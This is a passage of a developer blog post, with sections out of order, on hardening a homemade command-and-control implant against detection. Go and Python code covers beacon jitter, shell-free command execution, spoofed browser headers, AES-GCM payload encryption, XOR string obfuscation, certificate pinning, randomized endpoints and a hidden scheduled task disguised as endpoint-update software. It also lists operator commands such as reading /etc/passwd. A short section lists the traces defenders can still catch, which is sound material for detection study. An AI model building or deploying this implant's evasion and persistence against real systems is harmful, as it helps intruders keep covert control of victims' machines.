The hmac.compare_digest instead of == is a small detail that matters. Normal string comparison in Python short-circuits on the first differing byte. If you’re comparing a3f7c2e1 against a3f7xxxx, Python returns False as soon as it hits the 5th byte. Timing that comparison over many requests can theoretically leak how many leading bytes are correct. hmac.compare_digest runs in constant time regardless of where the strings differ. In practice, timing attacks over a network against a local API key are extremely hard to pull off, but the defense is one function call, so why not.

The dashboard prompts for the key on load, stores it in sessionStorage (wiped when the tab closes, not persisted across sessions), and injects it into every outbound API call through a centralized apiFetch() wrapper.

Server Header Spoofing

@app.after_request
def cloak_server_header(response):
    response.headers["Server"] = "nginx/1.24.0"
    return response

Every response now claims to be nginx instead of Werkzeug/3.x Python/3.x. It won’t survive deep probing (Flask’s error page format and response timing are distinct from nginx), but it defeats shallow fingerprinting.

Debug Mode

Off. The MVP had debug=True, which exposes the Werkzeug interactive debugger. If any route throws an unhandled exception, the debugger gives anyone with network access a full Python REPL on the C2 server. That’s a remote code execution vulnerability on your own infrastructure. Not great.


12. The CurrentDir Race Fix

This isn’t a new feature, but it’s a fix I specifically called out as pending in the first blog post, so I should close the loop.

The original code tracked the agent’s working directory in a global CurrentDir variable. cd commands wrote to it synchronously in the main loop, but regular commands read from it concurrently in goroutines. Running go run -race would flag this as a data race immediately.

The fix is a sync.RWMutex:

var (
    currentDirMu sync.RWMutex
    CurrentDir   string
)

func getCurrentDir() string {
    currentDirMu.RLock()
    defer currentDirMu.RUnlock()
    return CurrentDir
}

func setCurrentDir(dir string) {
    currentDirMu.Lock()
    defer currentDirMu.Unlock()
    CurrentDir = dir
}

Read-lock in every command execution path (ExecuteDiagnosticTask, RunDiagnosticProbe), write-lock in handleCd. Multiple commands can read the working directory concurrently (since they take read-locks), and a cd command blocks until all in-flight reads complete before writing.


13. What’s Still Detectable

I fixed every IOC from the first post. But “fixed” doesn’t mean “invisible.” Here’s what a competent blue team can still catch.

JA3 fingerprint mismatch. The browser profile spoofing works at the HTTP level. The TLS handshake still uses Go’s TLS stack, which produces a distinctive JA3 hash. A defender correlating JA3 against the User-Agent would see Chrome headers but a Go TLS fingerprint. The fix is uTLS (Phase 3).

Windows Event ID. The COM-based scheduled task avoids schtasks.exe in the process tree, but the task creation itself is recorded in the Security log as Event ID 4698 (a scheduled task was created). Any SIEM forwarding Windows events will see it (and most are).

systemd is not invisible. systemctl --user list-unit-files lists the service. The unit file sits in ~/.config/systemd/user/. File integrity monitoring catches it. A manual check catches it.

The cleanup batch script. On Windows self-destruct, the batch file written to disk with del /f /q loops is a forensic artifact. Better approaches exist (PowerShell Start-Process, MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT). Phase 3.

Bounded jitter. Traffic never exceeds JitterMax and never drops below JitterMin. That bounding box is a weak but extractable signal given enough observation time.

Process parentage. Even in exec mode, an unsigned binary spawning system utilities is unusual. No cmd.exe in between, but the parent-child relationship is still visible to an EDR that cares about who spawned whoami.exe.

DNS and IP reputation. None of this evasion work matters if the callback IP is already flagged. Threat intelligence feeds operate outside the agent’s control entirely.

No nonce replay tracking. The AES-256-GCM encryption uses random nonces and authenticated encryption, but the server doesn’t track seen nonces. An attacker with network access could replay a captured check-in blob. It would decrypt to a valid but stale payload. The server would process it as a duplicate check-in (mostly harmless), but it’s a gap in the design.
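For what it’s worth, closing that gap is not much code. Here’s a minimal sketch of server-side replay tracking; NonceCache and its TTL policy are my illustration, not code from the repo:

```python
import time

class NonceCache:
    """Track AES-GCM nonces already accepted, within a TTL window."""

    def __init__(self, ttl_seconds=3600.0):
        self.ttl = ttl_seconds
        self._seen = {}  # nonce bytes -> timestamp accepted

    def accept(self, nonce, now=None):
        """Return True if the nonce is fresh; False if it's a replay."""
        if now is None:
            now = time.monotonic()
        # Evict expired entries so the cache stays bounded
        self._seen = {n: t for n, t in self._seen.items() if now - t < self.ttl}
        if nonce in self._seen:
            return False
        self._seen[nonce] = now
        return True
```

The TTL keeps memory bounded; anything replayed after the window would need a separate staleness check (a timestamp inside the encrypted payload, say), which is a design choice beyond this sketch.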


14. Phase 3 Roadmap

JA3 fingerprint spoofing. Integrate uTLS to mimic a specific browser’s TLS handshake. If you’re spoofing Chrome at the HTTP level, you should be spoofing Chrome at the TLS level too.

In-memory payload execution. The agent currently touches disk as a binary. Phase 3 explores reflective loading and in-memory execution (still very much in the research phase).

macOS persistence. LaunchAgent plists in ~/Library/LaunchAgents/ (if I can get my hands on a MacBook to do testing).

Interactive shell sessions. The current model is request-response: send a command, get output. Phase 3 adds persistent shell sessions with piped I/O for interactive tooling.

Traffic shaping. Varying payload sizes and timing to mimic legitimate application traffic (Slack webhooks, Windows Update telemetry, cloud API calls) instead of just randomizing the interval.

Agent chaining. Using a compromised host to relay traffic for agents that can’t reach the C2 server directly.

This list is subject to change as I continually research better methods and more features. The most up-to-date version will always be in the README.md in the GitHub repo.


Phase 1 started as a framework that would get caught by strings and a regex. It now requires behavioral analysis, process tree correlation, TLS fingerprinting, or Windows event log forwarding. The gap between those two levels of detection effort is where all the engineering in this post lives. Every fix moved the detection bar from “automated scan” to “manual investigation,” and understanding exactly where that bar sits now, and why it can’t go higher without the Phase 3 work, is the whole point of building from scratch.

This framework is built for educational purposes only.

1. Introduction

In the first post, I built a C2 framework from scratch and then spent half the article explaining exactly how a Blue Team would catch it. Fixed-interval beaconing, cmd.exe in every process tree, persistence under a registry key literally named C2Agent, plaintext JSON on the wire, and a Go-http-client/1.1 User-Agent header that might as well be a confession.

I ended that post with a roadmap. Jitter, encryption, certificate pinning, direct process execution, COM-based persistence, User-Agent spoofing, URL randomization, API authentication. This post is the follow-through. Every IOC I flagged, what I built to address it, the engineering problems I ran into along the way, and an honest look at what’s still detectable.

Fair warning: this got long. Each fix turned out to be more than “just change the string.” Almost every one had a second-order problem I didn’t anticipate until I was in the middle of it. That’s the point of building from scratch.


2. Killing the Beacon Pattern

The original problem: The agent slept for exactly N seconds between check-ins, every single cycle. RITA (Real Intelligence Threat Analytics) eats this for breakfast. Zero variance over a long enough sample window is a dead giveaway.

The obvious fix is jitter. But there’s a design choice hiding in “add jitter” that isn’t immediately obvious: how you randomize the interval matters.

Percentage-Based vs. Range-Based

Cobalt Strike uses a percentage model. You set a base interval (say 60 seconds) and a jitter percentage (say 50%). Each sleep is then drawn randomly, most likely with a model like Base - (Base * Random_Percentage_up_to_Jitter). The problem is that a uniform distribution has fixed, recoverable statistics: the observed maximum converges on the 60-second base, and the mean converges on Base * (1 - Jitter/2). A defender running statistical analysis on your connection timestamps can extract that base frequency and flag it.
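The base leaks through simple statistics, which a quick simulation makes concrete (illustrative Python; the constants and the model are my reconstruction of the percentage scheme, not Cobalt Strike’s code):

```python
import random

random.seed(1337)  # deterministic for the demo
BASE, JITTER = 60.0, 0.5  # 60-second interval, 50% jitter

# Percentage model: each sleep = Base - Base * U(0, Jitter)
samples = [BASE - BASE * random.uniform(0.0, JITTER) for _ in range(100_000)]

mean = sum(samples) / len(samples)
# The mean converges on Base * (1 - Jitter/2); the maximum converges on Base.
recovered_from_mean = mean / (1 - JITTER / 2)
recovered_from_max = max(samples)
```

Either statistic hands the defender the 60-second base. A flat min/max range has no equivalent anchor: its mean is just the midpoint of whatever bounds the operator picked.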

I went with a flat min/max range instead:

// agent/funcs/sync_backoff.go

func CalculateBackoff(min, max time.Duration) time.Duration {
    if min >= max {
        return min
    }
    delta := max - min
    jitter := time.Duration(rand.Int63n(int64(delta)))
    return min + jitter
}

func DelayNextSync(min, max time.Duration) {
    time.Sleep(CalculateBackoff(min, max))
}

The operator sets a minimum and maximum delay at build time (say 8 and 30 seconds). Each sleep is uniformly sampled between the two. There’s no “base” to extract. The mean is just the midpoint of the range, which isn’t more meaningful than any other value. Every duration in the range is equally likely.

The interval generator is seeded from crypto/rand rather than left on math/rand’s deterministic default, so the sequence can’t be predicted just from knowing the range.

What This Doesn’t Solve

A defender watching connection timestamps will still see traffic that never exceeds JitterMax and never drops below JitterMin. That bounding box is itself a weak signature. A sufficiently tuned RITA configuration with custom thresholds could flag it. But it won’t trip the default thresholds on most automated beacon detection tools, and it forces the defender from “run automated scan, get alert” to “manually analyze connection patterns over an extended window.” That’s a meaningful increase in detection cost.


3. Dual Execution Modes

The original problem: Every single command went through cmd.exe /C on Windows or /bin/sh -c on Linux. The process tree for a simple whoami looked like:

agent.exe
  └── cmd.exe /C whoami
        └── whoami.exe

EDR products flag this aggressively. An unknown parent repeatedly spawning cmd.exe with varying arguments is textbook C2.

In the first post, I said the fix was direct Windows API calls: GetUserNameW instead of whoami, FindFirstFile instead of dir. I changed my mind. Writing a syscall wrapper for every command I might ever want to run is a losing game. There are hundreds of Windows utilities, and reimplementing even ten of them in pure Go syscalls would be a massive engineering effort for diminishing returns. Instead, I added a second execution mode that removes the shell from the process tree while still running the original binary:

// agent/funcs/exec_direct.go

func RunDiagnosticProbe(command string) (string, error) {
    binary, args := splitDiagnosticArgs(command)

    resolved, err := exec.LookPath(binary)
    if err != nil {
        return "", fmt.Errorf("not found in PATH: %s", binary)
    }

    ctx, cancel := context.WithTimeout(context.Background(), CommandTimeout)
    defer cancel()

    cmd := exec.CommandContext(ctx, resolved, args...)
    cmd.Dir = getCurrentDir()
    setHideWindow(cmd)

    output, err := cmd.CombinedOutput()
    // ...
}

exec.LookPath searches PATH for the binary, then exec.CommandContext spawns it directly. No shell interpreter in between. The process tree now looks like:

agent.exe
  └── whoami.exe

Still visible if an EDR is watching parent-child relationships closely, but cmd.exe is gone. The signal is much weaker.

The Argument Parser

Removing the shell means losing shell argument parsing. When cmd.exe handles findstr "hello world" file.txt, it knows "hello world" is a single argument. Without a shell, I needed my own parser:

func splitDiagnosticArgs(command string) (string, []string) {
    var tokens []string
    var current strings.Builder
    inDouble := false
    inSingle := false

    for i := 0; i < len(command); i++ {
        c := command[i]
        switch {
        case c == '"' && !inSingle:
            if inDouble && i+1 < len(command) && command[i+1] == '"' {
                current.WriteByte('"') // "" escape (Windows convention)
                i++
            } else {
                inDouble = !inDouble
            }
        case c == '\'' && !inDouble:
            inSingle = !inSingle
        case c == '\\' && inDouble && i+1 < len(command) && command[i+1] == '"':
            current.WriteByte('"') // \" escape
            i++
        case (c == ' ' || c == '\t') && !inDouble && !inSingle:
            if current.Len() > 0 {
                tokens = append(tokens, current.String())
                current.Reset()
            }
        default:
            current.WriteByte(c)
        }
    }
    // ...
    return tokens[0], tokens[1:]
}

This handles double quotes, single quotes, \" escapes inside double-quoted strings, and "" as an escaped double-quote (the Windows convention that tripped me up for an embarrassing amount of time). Shell metacharacters like |, >, and && are treated as literal argument strings. They won’t be interpreted.

Which is why the shell mode still exists. When the operator needs pipes, redirects, or command chaining, they prefix the command with shell and accept the OPSEC cost:

whoami                              → exec mode (default, no shell)
net user admin /domain              → exec mode
shell dir C:\Users && whoami        → shell mode (needs &&)
shell cat /etc/passwd | grep root   → shell mode (needs pipe)
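For illustration, here are the tokenizer’s quoting rules re-sketched in Python (the real parser is Go; this port and its test strings are mine):

```python
def split_diagnostic_args(command: str):
    # Illustrative port of the Go tokenizer's quoting rules:
    # double quotes, single quotes, \" escapes, and the Windows "" escape.
    tokens, current = [], []
    in_double = in_single = False
    i = 0
    while i < len(command):
        c = command[i]
        if c == '"' and not in_single:
            if in_double and i + 1 < len(command) and command[i + 1] == '"':
                current.append('"')  # "" escape (Windows convention)
                i += 1
            else:
                in_double = not in_double
        elif c == "'" and not in_double:
            in_single = not in_single
        elif c == '\\' and in_double and i + 1 < len(command) and command[i + 1] == '"':
            current.append('"')  # \" escape inside double quotes
            i += 1
        elif c in (' ', '\t') and not in_double and not in_single:
            if current:
                tokens.append(''.join(current))
                current = []
        else:
            current.append(c)
        i += 1
    if current:
        tokens.append(''.join(current))
    if not tokens:
        return '', []
    return tokens[0], tokens[1:]
```

Quoted arguments survive as single tokens, while shell metacharacters like `|` come through as literal arguments, exactly the behavior that forces the explicit shell-mode escape hatch.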

The server tags each task with a type field ("exec" or "shell"), and the agent’s dispatcher routes accordingly:

switch j.Type {
case "exec":
    output, execErr = funcs.RunDiagnosticProbe(j.Command)
default:
    output, execErr = funcs.ExecuteDiagnosticTask(j.Command)
}

The dashboard shows a green [exec] badge or an orange [shell] badge next to each command, so the operator knows exactly which mode ran. The OPSEC decision is explicit, visible, and never automatic.


4. Browser Profile Spoofing

The original problem: Go’s http.DefaultClient sends User-Agent: Go-http-client/1.1, which is an immediate flag. I said the fix was to spoof the User-Agent to match normal browser traffic.

What I didn’t appreciate at the time is that just setting the User-Agent string is maybe 20% of the problem. Modern browsers send a pile of metadata headers alongside every request, and they change depending on context. Getting the UA right but everything else wrong creates an IOC on its own: the User-Agent says Chrome, but the rest of the headers say “something that has never been a browser.”

The Header Problem

A real Chrome request to a website includes:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Sec-Ch-Ua: "Chromium";v="147", "Not-A.Brand";v="24", "Google Chrome";v="147"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,...
Accept-Language: en-US,en;q=0.9

A Chrome fetch() call from JavaScript includes:

Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Accept: */*

Notice what changed. navigate became cors, document became empty, Sec-Fetch-User and Upgrade-Insecure-Requests disappeared entirely, and the Accept header changed. These aren’t optional differences. If the agent sends Sec-Fetch-Mode: navigate on a JSON POST to an API endpoint, that’s a logical impossibility; real browsers never do that. A navigation is a page load triggered by the user clicking a link or typing a URL, while a POST with a JSON body is a programmatic API call. They have different security semantics, and Chrome enforces that distinction in its headers.

If someone is running network analysis and they see a request that claims to be Chrome navigating to a page, but the body is JSON and the method is POST, that’s not Chrome. That’s something pretending to be Chrome, and pretending badly.

The UATransport

The fix is a custom http.RoundTripper that intercepts every outbound HTTP request and injects the correct header set based on what the request actually is:

// agent/funcs/ua.go

type UATransport struct {
    Base    http.RoundTripper
    Profile Profile
}

func (t *UATransport) RoundTrip(req *http.Request) (*http.Response, error) {
    clone := req.Clone(req.Context())
    isFetch := req.Method == "POST"

    clone.Header.Del("User-Agent")

    for key, value := range t.Profile.Headers {
        switch {
        case isFetch && key == "Sec-Fetch-Mode":
            clone.Header.Set(key, "cors")
        case isFetch && key == "Sec-Fetch-Dest":
            clone.Header.Set(key, "empty")
        case isFetch && key == "Sec-Fetch-Site":
            clone.Header.Set(key, "same-origin")
        case isFetch && (key == "Sec-Fetch-User" || key == "Upgrade-Insecure-Requests"):
            continue // Drop navigation-only headers on fetch
        default:
            clone.Header.Set(key, value)
        }
    }

    clone.Header.Set("User-Agent", t.Profile.UserAgent)
    return t.Base.RoundTrip(clone)
}

POST requests (check-ins, result submissions) get fetch context. GET requests (file downloads) get navigation context. The transport is wired into http.DefaultClient at init, so every HTTP call the agent makes goes through it; no code path can accidentally bypass the spoofing.

Five Profiles

The agent ships with five browser profiles, each matching a real browser’s current fingerprint:

  1. Chrome 147 / Windows 10 - full Sec-Ch-Ua client hints with the real stable build string (147.0.7727.55) and the correct Not-A.Brand version (v="24")
  2. Chrome 147 / Linux
  3. Firefox 149 / Windows 10 - no client hints (Firefox doesn’t send them), Firefox-specific Accept header format
  4. Firefox 149 / Linux
  5. Safari 26 / macOS - AppleWebKit/605.1.15 engine string, Safari-specific defaults

The operator selects a profile at build time, and the profile ID and a configurable locale string (for Accept-Language) are baked into the binary.

A Mistake I Made Along the Way

My first Chrome profiles used the placeholder version pattern: Chrome/147.0.0.0 and Not-A.Brand";v="99". This is the pattern that appears in Chrome’s documentation examples and in a lot of spoofing guides. The problem is that real Chrome never ships with .0.0.0 as the minor/build/patch version, and v="99" is the old placeholder that Chrome has since replaced with v="24". Fingerprinting tools specifically flag these placeholder patterns because they indicate a non-genuine client. I had to go check what actual Chrome stable was sending in the wild and match those exact values.

This is the kind of thing you don’t learn from reading about spoofing. You learn it by building it, testing it against a fingerprint checker, and watching it get flagged for a reason you didn’t expect.

What This Doesn’t Solve

The browser profile spoofing works at the HTTP layer; it doesn’t touch the TLS layer. Go’s TLS stack produces a distinctive JA3 fingerprint (a hash of the TLS Client Hello parameters) that doesn’t match any real browser. A defender correlating the JA3 hash against the claimed User-Agent would see Chrome headers but a Go TLS handshake. The fix is uTLS, a library that lets you mimic a specific browser’s TLS handshake. That’s Phase 3.


5. Payload Encryption (AES-256-GCM)

The original problem: All C2 traffic was plaintext JSON. Check-in payloads, command output, exfiltrated files, all readable by any network tap. A Suricata rule matching "agent_id" in POST bodies would catch every check-in.

Per-Build Keys

At build time, the server generates a fresh 32-byte key and derives an 8-character fingerprint from its SHA-256:

# server/crypto.py

def generate_key():
    key_bytes = os.urandom(32)
    key_hex = key_bytes.hex()
    key_id = hashlib.sha256(key_bytes).hexdigest()[:8]
    return key_hex, key_id

The key is hex-encoded and baked into the agent binary. The key_id fingerprint is not secret: it’s sent in the clear with every message so the server knows which decryption key to use. Since each build gets its own key, the server can manage agents from different builds simultaneously, and compromising one build’s key tells you nothing about another.

The Encryption

AES-256-GCM with a random 12-byte nonce per message:

// agent/funcs/seal.go

func SealTelemetry(key []byte, plaintext []byte) (string, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return "", err
    }
    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return "", err
    }

    nonce := make([]byte, gcm.NonceSize()) // 12 bytes
    if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
        return "", err
    }

    blob := gcm.Seal(nonce, nonce, plaintext, nil)
    return base64.StdEncoding.EncodeToString(blob), nil
}

The gcm.Seal(nonce, nonce, plaintext, nil) call is doing something a little non-obvious. The first nonce argument is the destination slice prefix, the output gets appended to it. So the result is [12-byte nonce][ciphertext][16-byte GCM auth tag], all in one blob. The receiver splits on byte 12 to separate the nonce from the ciphertext.

I chose GCM specifically because it’s an authenticated encryption mode. The 16-byte tag means any tampering with the ciphertext causes decryption to fail. A network proxy can’t modify commands in transit (say, changing whoami to shutdown /s) because the authentication tag would be invalid. It also enables replay detection at the individual message level: a replayed blob reuses its nonce, so a server that tracked seen nonces could flag the duplicate (mine currently doesn’t, admittedly; that’s a gap).

The Envelope

Every message between agent and server wraps the encrypted payload in a simple JSON envelope:

{
    "kid": "a3f7c2e1",
    "data": "Base64(nonce + ciphertext + tag)"
}

The server-side decryption mirrors the agent:

# server/crypto.py

def decrypt_payload(key_hex, encoded):
    key = bytes.fromhex(key_hex)
    raw = base64.b64decode(encoded)
    nonce, ct = raw[:12], raw[12:]
    return AESGCM(key).decrypt(nonce, ct, None)

If the key is wrong or the data has been tampered with, AESGCM.decrypt() raises InvalidTag and the request is rejected.
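The full blob layout is easy to exercise end-to-end in Python with the same AESGCM primitive the server uses (the helper names here are mine, not from the repo):

```python
import os
import base64
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def seal(key: bytes, plaintext: bytes) -> str:
    # Mirrors the agent's layout: [12-byte nonce][ciphertext][16-byte tag]
    nonce = os.urandom(12)
    blob = nonce + AESGCM(key).encrypt(nonce, plaintext, None)
    return base64.b64encode(blob).decode()

def open_sealed(key: bytes, encoded: str) -> bytes:
    raw = base64.b64decode(encoded)
    nonce, ct = raw[:12], raw[12:]
    return AESGCM(key).decrypt(nonce, ct, None)  # raises InvalidTag on tamper
```

Flipping any byte of the blob, whether in the nonce, the ciphertext, or the tag, makes decryption raise InvalidTag. That is exactly the property that blocks in-transit tampering.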

What This Doesn’t Solve

Encryption makes the payload opaque. It doesn’t make the traffic invisible. A network analyst can still see that something is making periodic POST requests to the same endpoint with similar-sized JSON bodies. Traffic analysis (connection timing, payload size patterns, IP reputation) operates on metadata, not content. The encryption prevents a Suricata rule from matching on specific field names in the body, but it doesn’t prevent behavioral analysis from flagging the pattern.


6. XOR String Obfuscation

The original problem: Running strings against the compiled binary would reveal the server URL, all API paths, the self-destruct (__selfdestruct__), and the persistence service name. Any YARA rule matching those strings would instantly classify the binary.

AES handles the wire, while XOR handles the binary.

At build time, the server generates a random 32-byte key per build and encrypts every sensitive string before writing it into the generated config.go:

# server/app.py

def _xor_encrypt(key, plaintext):
    data = plaintext.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

The result is hex-encoded and written as a Go string literal. At runtime, the agent decodes them into memory on first use:

// agent/funcs/config_decode.go

func ResolveConfig(key []byte, hexData string) string {
    data, _ := hex.DecodeString(hexData)
    out := make([]byte, len(data))
    for i, b := range data {
        out[i] = b ^ key[i%len(key)]
    }
    return string(out)
}

The generated config.go looks like this:

func InitializeTelemetry() {
    TelemetryEndpoint = funcs.ResolveConfig(obfKey, "a7c3f2e1b9d0...")
    PathCheckin       = funcs.ResolveConfig(obfKey, "b1d4e5f6a2c3...")
    PathResult        = funcs.ResolveConfig(obfKey, "c9e8f7d6b5a4...")
    FlushCommand      = funcs.ResolveConfig(obfKey, "d2f1a3b4c5e6...")
    ServiceLabel      = funcs.ResolveConfig(obfKey, "e4b6c8d9a1f2...")
}

Nothing sensitive appears as a printable string in the binary. strings turns up hex garbage.

Is XOR real encryption? No, and I’m not going to pretend it is. XOR with a repeating key is trivially breakable with known-plaintext or frequency analysis. If a reverse engineer opens the binary in Ghidra, finds the ResolveConfig function, grabs the XOR key from the neighboring variable, and runs the decryption manually, they’ll have every string in clear text in about ten minutes. But the threat model for string obfuscation isn’t a reverse engineer doing focused analysis; it’s automated scanners: YARA rules, EDR heuristics, the SOC analyst’s strings | grep during initial triage. XOR defeats all of those. It buys you time by moving the binary from “instantly flagged by automated tools” to “requires manual analysis to classify.”
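Round-tripping the scheme in a few lines of Python shows the symmetry between the server-side encryptor and the agent-side decoder (the endpoint URL below is a placeholder, not a value from any real build):

```python
import os

def xor_encrypt(key: bytes, plaintext: str) -> str:
    # Server side: XOR against a repeating key, then hex-encode
    data = plaintext.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

def resolve_config(key: bytes, hex_data: str) -> str:
    # Agent side: the inverse is the same operation, since XOR is symmetric
    data = bytes.fromhex(hex_data)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode()
```

The hex output contains no printable trace of the original string, which is the entire point: strings sees hex garbage, while the agent recovers the value in memory on first use.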


7. Certificate Pinning

The original problem: All traffic was unencrypted HTTP. The fix was HTTPS, but self-signed certificates introduce their own trust problem.

The Trust Problem

When you use a self-signed cert, the agent can’t validate it through the normal certificate chain (there’s no CA that vouches for it). If you just set InsecureSkipVerify: true and call it a day, you’ve encrypted the transport but you haven’t authenticated the server. A man-in-the-middle can present their own cert and the agent will happily connect. You’ve built a door and then left it open.

Certificate pinning solves this. Instead of trusting a CA chain, the agent knows the exact public key it expects to see, baked into the binary at build time. If the TLS handshake presents a different key, the connection is refused, with no fallback.

How It Works

The operator generates a self-signed cert before starting the server:

python gen_cert.py --cn localhost --san-ip 127.0.0.1 --san-dns localhost

The server auto-detects server/certs/server.crt at startup and switches to HTTPS. At build time, the pipeline reads the cert, extracts the SPKI (Subject Public Key Info), hashes it with SHA-256, XOR-encrypts the hash, and bakes it into the binary:

def compute_spki_pin(cert):
    spki_der = cert.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo
    )
    return hashlib.sha256(spki_der).hexdigest()

At runtime, the agent sets up a custom TLS verifier:

// agent/funcs/pinverify.go

func MakePinVerifier(pinnedHash string) func([][]byte, [][]*x509.Certificate) error {
    return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
        if len(rawCerts) == 0 {
            return fmt.Errorf("no certificate presented")
        }

        cert, err := x509.ParseCertificate(rawCerts[0])
        if err != nil {
            return fmt.Errorf("failed to parse certificate: %w", err)
        }

        spkiDER, err := x509.MarshalPKIXPublicKey(cert.PublicKey)
        if err != nil {
            return fmt.Errorf("failed to marshal public key: %w", err)
        }

        hash := sha256.Sum256(spkiDER)
        actual := hex.EncodeToString(hash[:])

        if actual != pinnedHash {
            return fmt.Errorf("certificate pin mismatch")
        }
        return nil
    }
}

The TLS config uses InsecureSkipVerify: true (to bypass the CA chain check that would reject a self-signed cert) and replaces it with VerifyPeerCertificate pointing at the pin verifier. The agent extracts the leaf certificate from the TLS handshake, serializes its public key to SPKI DER format, SHA-256 hashes it, and compares. Mismatch = hard fail, no retry, no fallback.

There’s also a panic at startup if a pin is set but the server URL starts with http://. Running pin verification over unencrypted HTTP is a contradiction that should fail.

Why Pin the SPKI, Not the Whole Certificate?

If I pinned the full certificate hash, the agent would break every time the cert was renewed, even if the key pair stayed the same (just the expiry date changed). By pinning just the public key’s SPKI hash, the operator can re-sign the cert with a new validity period and existing agents keep working. If they actually rotate the key pair, they rebuild all agents. That’s a reasonable trade-off in my opinion (for now).
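The renewal property is easy to verify: two certificates signed from the same key pair pin identically. Here’s a sketch using the cryptography library (self_signed is my helper, not repo code):

```python
import datetime
import hashlib
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat

def compute_spki_pin(cert):
    # Hash only the SubjectPublicKeyInfo, not the whole certificate
    spki = cert.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
    return hashlib.sha256(spki).hexdigest()

def self_signed(key, days):
    # Minimal self-signed cert with a configurable validity window
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "localhost")])
    now = datetime.datetime.now(datetime.timezone.utc)
    return (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(now)
        .not_valid_after(now + datetime.timedelta(days=days))
        .sign(key, hashes.SHA256())
    )
```

Re-signing with a different validity period leaves the pin unchanged; only rotating the key pair changes it, which is exactly when you’d want existing agents to stop trusting the server.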


8. Randomized URL Slugs

The original problem: /api/checkin, /api/result, and /api/upload are descriptive, human-readable, and easy to write Snort/Suricata signatures for.

At first server launch, four random 8-character hex slugs are generated and stored in SQLite:

def _init_agent_paths():
    keys = ["path_checkin", "path_result", "path_upload", "path_files"]
    for k in keys:
        stored[k] = "/" + secrets.token_hex(4)  # e.g. "/a1b2c3d4"

The agent-facing endpoints now live at paths like /a1b2c3d4. The slugs persist across server restarts so existing agents stay connected. At build time, all four paths are XOR-encrypted and baked into the agent binary. They never appear as plaintext in the binary or in the agent’s source code.

The operator-facing API (/api/task, /api/agents, /api/builds, etc.) still lives at /api/*. This split also makes the API key authentication simpler: the @before_request hook checks for an X-API-Key header on any path starting with /api/. Agent-facing paths fall outside that namespace, so agents don’t need the operator key.

Signature-based detection now has to target per-deployment paths that look like any other random hex identifier: a session token, a UUID fragment, a CDN cache key. Not impossible to detect, but the analyst can’t write one rule that catches every deployment.
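The slug generation and the namespace split can be sketched together; the helper names here are hypothetical, the real logic lives in the Flask app:

```python
import secrets

def generate_agent_paths():
    # One random 8-hex-char slug per agent-facing endpoint, e.g. "/a1b2c3d4"
    keys = ("path_checkin", "path_result", "path_upload", "path_files")
    return {k: "/" + secrets.token_hex(4) for k in keys}

def requires_operator_key(path: str) -> bool:
    # The before_request auth hook only guards the /api/* namespace;
    # agent slugs never start with "/api/" because 'p' and 'i' aren't hex digits
    return path.startswith("/api/")
```

The character-set detail is what makes the split airtight: a hex slug can never collide with the /api/ prefix, so no agent request will ever be challenged for an operator key.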


9. Persistence: Scheduled Tasks and Systemd

The original problem: Three compounding failures. Windows persistence spawned reg.exe (visible in process tree), wrote to the most-monitored registry key in existence (HKCU\...\Run), and named the entry C2Agent.

I replaced this with two new persistence backends. The legacy methods (registry run key, crontab @reboot) are still available for operators who want to test detection rules for those specific mechanisms, but the defaults are now significantly quieter.

Windows: Task Scheduler via COM

Instead of spawning schtasks.exe or reg.exe, the agent talks directly to the Task Scheduler through the COM API. No child process. Everything happens in-process:

// agent/funcs/update_scheduler_windows.go

func registerUpdateSchedule(exePath string) error {
    ole.CoInitializeEx(0, ole.COINIT_APARTMENTTHREADED)
    defer ole.CoUninitialize()

    unknown, _ := oleutil.CreateObject("Schedule.Service")
    service, _ := unknown.QueryInterface(ole.IID_IDispatch)
    defer service.Release()

    oleutil.CallMethod(service, "Connect")

    folder := oleutil.MustCallMethod(service, "GetFolder", "\\").ToIDispatch()
    defer folder.Release()

    def := oleutil.MustCallMethod(service, "NewTask", 0).ToIDispatch()
    defer def.Release()
    // ...
}

The task is configured with a logon trigger (fires on user login), standard user privileges (no UAC prompt), marked hidden in the Task Scheduler UI, and no execution time limit. The registration flag is 6 (TASK_CREATE_OR_UPDATE), so running the agent twice updates the existing task instead of creating a duplicate.

The task name comes from the XOR-obfuscated ServiceLabel constant, which decodes to EndpointAutoUpdate. The description:

Keeps endpoint telemetry data in sync with the management server.

That reads like corporate endpoint management software. A sysadmin scrolling through Task Scheduler wouldn’t look twice. An analyst specifically hunting for new scheduled tasks (Windows Event ID 4698) would still find it, but the name and description wouldn’t scream “malware.”

One thing that tripped me up during development: COM object lifecycle management. Every QueryInterface, every MustCallMethod that returns an IDispatch, every ToIDispatch() conversion creates a COM reference that needs to be released. If you miss a Release() call, you leak COM references. In a short-lived program this doesn’t matter much, but if the persistence code ever ran in a loop (retry logic, re-registration), the leak would compound. Every COM object now gets a deferred Release() immediately after acquisition.

Linux: Systemd User Service

On Linux, the agent writes a systemd user service and enables it:

func registerUpdateDaemon(exePath string) error {
    home := os.Getenv("HOME")
    if home == "" {
        return fmt.Errorf("$HOME is not set")
    }

    unitDir := filepath.Join(home, ".config", "systemd", "user")
    if err := os.MkdirAll(unitDir, 0755); err != nil {
